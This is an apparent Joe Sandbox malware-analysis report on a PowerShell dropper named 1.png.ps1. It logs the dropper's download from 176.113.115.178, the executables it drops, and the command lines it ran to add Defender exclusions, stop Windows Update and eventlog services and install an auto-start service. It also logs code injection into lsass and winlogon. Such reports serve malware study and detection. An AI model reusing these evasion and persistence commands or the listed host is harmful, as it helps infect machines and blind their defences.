00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /FF/M.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: global trafficHTTP traffic detected: GET /FF/M.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
        Source: powershell.exe, 00000001.00000002.1625367670.0000014FA47E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1625367670.0000014FA5007000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178
        Source: powershell.exe, 00000001.00000002.1625367670.0000014FA3832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/FF/M.png
        Source: powershell.exe, 00000003.00000002.1415950927.000002316E1FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: powershell.exe, 00000003.00000002.1415950927.000002316E1FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
        Source: powershell.exe, 00000003.00000002.1415950927.000002316E1FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
        Source: powershell.exe, 00000001.00000002.1691071942.0000014FB37B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1625367670.0000014FA5065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1691071942.0000014FB3674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000001.00000002.1625367670.0000014FA3601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1386534661.0000023100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000001.00000002.1625367670.0000014FA3601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1386534661.0000023100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000002.1625367670.0000014FA47E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000001.00000002.1691071942.0000014FB37B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1625367670.0000014FA5065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1691071942.0000014FB3674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        System Summary

        barindex
        PE file contains section with special chars
        Source: LB31.exe.1.drStatic PE information: section name:
        Source: LB31.exe.1.drStatic PE information: section name: .idata
        Source: LB31.exe.1.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name: .idata
        Source: Mig.exe.6.drStatic PE information: section name:
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB31.exeJump to dropped file
        Uses powercfg.exe to modify the power settings
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,29_2_00000001400010C0
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC603828C8 NtEnumerateValueKey,NtEnumerateValueKey,35_2_000001FC603828C8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C737253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,41_2_00000161C737253C
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C737202C NtQuerySystemInformation,StrCmpNIW,41_2_00000161C737202C
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918E28C8 NtEnumerateValueKey,NtEnumerateValueKey,43_2_00000210918E28C8
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_000000014000226C29_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_00000001400014D829_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_000000014000256029_2_0000000140002560
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC5FF9D0E035_2_000001FC5FF9D0E0
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC5FFA38A835_2_000001FC5FFA38A8
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC5FF91F2C35_2_000001FC5FF91F2C
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC60382B2C35_2_000001FC60382B2C
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC603944A835_2_000001FC603944A8
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC6038DCE035_2_000001FC6038DCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C73538A841_2_00000161C73538A8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C734D0E041_2_00000161C734D0E0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C7341F2C41_2_00000161C7341F2C
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C73844A841_2_00000161C73844A8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C737DCE041_2_00000161C737DCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C7372B2C41_2_00000161C7372B2C
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91BD0E042_2_00000233B91BD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91C38A842_2_00000233B91C38A8
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91B1F2C42_2_00000233B91B1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91EDCE042_2_00000233B91EDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91F44A842_2_00000233B91F44A8
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91E2B2C42_2_00000233B91E2B2C
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918F44A843_2_00000210918F44A8
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918EDCE043_2_00000210918EDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918E2B2C43_2_00000210918E2B2C
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_0000021091CFD0E043_2_0000021091CFD0E0
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_0000021091D038A843_2_0000021091D038A8
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_0000021091CF1F2C43_2_0000021091CF1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E96D0E044_2_000002062E96D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E9738A844_2_000002062E9738A8
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E961F2C44_2_000002062E961F2C
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E99DCE044_2_000002062E99DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E9A44A844_2_000002062E9A44A8
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E992B2C44_2_000002062E992B2C
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8D71F2C45_2_00000282B8D71F2C
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8D7D0E045_2_00000282B8D7D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8D838A845_2_00000282B8D838A8
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DA2B2C45_2_00000282B8DA2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DADCE045_2_00000282B8DADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DB44A845_2_00000282B8DB44A8
        Source: Joe Sandbox ViewDropped File: C:\ProgramData\Mig\Mig.exe A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\LB31.exe A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
        Source: classification engineClassification label: mal100.spyw.evad.winPS1@56/74@0/1
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,29_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,29_2_00000001400019C4
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,29_2_000000014000226C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB31.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2068:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1e54ndq3.1so.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: 1.png.ps1ReversingLabs: Detection: 21%
        Source: LB31.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
        Source: Mig.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB31.exe "C:\Users\user\AppData\Roaming\LB31.exe"
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LIB"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LIB"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\ProgramData\Mig\Mig.exe C:\ProgramData\Mig\Mig.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB31.exe "C:\Users\user\AppData\Roaming\LB31.exe" Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LIB"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LIB"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
